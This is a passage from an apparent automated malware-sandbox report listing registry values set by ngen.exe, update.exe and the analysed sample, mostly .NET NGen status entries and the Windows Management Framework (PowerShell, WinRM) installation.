[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 9C 99 84 C9 AE 72 9F BB 2B 96 BE 1E 16 32 B8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 E8 25 0C 96 ED 5D 5D C6 D8 5E F1 B4 49 5A 07"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 7B 3C C1 48 FC 3C 26 89 C5 D8 F2 33 D7 1B 24"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 45 DC C4 E0 AD F5 2C F4 0A EF 3C 8A 87 9B 3A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 7C 07 2A FB CC 8B A0 C6 3E 33 08 5B 16 66 F9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 D0 BC 25 C6 66 6D 2B 85 18 91 32 FE CD 5A 2B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 2C 3F A3 4F 14 67 5D DB 11 E3 E9 5A D1 C4 77"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 B8 FF B8 93 C6 C8 A6 A7 03 AA 10 CE 53 C6 67"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 7C 7B 97 70 7B FA 20 F0 DC B7 2C 3B F2 06 62"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 9B FC BB 98 8C 06 52 F5 04 49 E7 CA 5D 0C 8C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 6C 60 BE C9 CB E9 65 60 CD 7C 64 C3 53 7F 86"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 5C AE 8D 4B A7 4A D3 3B 4C D1 46 BF 19 7D 0D"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 3F 53 B9 00 C7 2E 02 6C 68 72 D1 B2 B0 8A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 2A C1 8E BB E7 E8 B4 26 85 38 4F A2 22 90 86"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 38 35 05 F7 59 9D CF E4 A9 AC 2D BE 1A D9 5E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process %original file name%.exe:148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 56 2D 9D 70 8C 41 80 4E 82 D8 BC 11 F1 5C 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 63 B4 A0 BD F0 85 98 30 23 61 BC 7F 25 5B A2"

The process update.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.inf" = "1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
